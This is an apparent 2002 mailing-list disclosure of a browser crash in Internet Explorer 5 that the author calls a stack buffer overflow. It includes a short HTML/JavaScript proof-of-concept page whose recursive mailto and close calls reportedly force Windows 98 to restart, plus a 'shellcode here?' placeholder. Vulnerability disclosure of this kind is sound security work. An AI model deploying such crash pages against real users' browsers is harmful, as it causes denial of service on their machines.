From: Matias Sedalo (s0t4ipv6@shellcode.com.ar)
Date: Sun Jun 02 2002 - 16:08:24 CDT
On 28/07/1999 I discovered a stack buffer overflow caused by, up to now,
all versions of Internet Explorer.
On many Windows 98 machines it makes it necessary to restart the computer,
since, as it seems to me, it is left without memory.
It has only been tested on several version 5 releases of IE on Windows NT
Server SP6 and Windows 98 Second Edition. As I said before, the Windows 98
machine I had to restart by force.
Is it possible to execute arbitrary code using the variable company of
the example?
// internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
// internet Explorer 5.00.3500.1003 on Windows98se
-----------cut here---------------------------
<html><head></head>
<script language="JAVASCRIPT">
function hacerMail() {
var company;
crear();
address="s0t4ipv6@shellcode.com.ar";
soporte();
}
function soporte(){
var soporte="bill@mocosoft.com";
window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
// window.location=company; // also this line cause the bof.
close(hacerMail());
}
function crear(){
company="shellcode here?\n"; // i don't think so.
}
</script>
<input type="button" onClick="hacerMail();" value="SMASH!"></input>
</html>
-----------cut here---------------------------
Regards.
- The Internet is harmful to your health -
- Law No. 127.0.0.1
Matias Sedalo
http://www.shellcode.com.ar
s0t4ipv6@shellcode.com.ar
B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2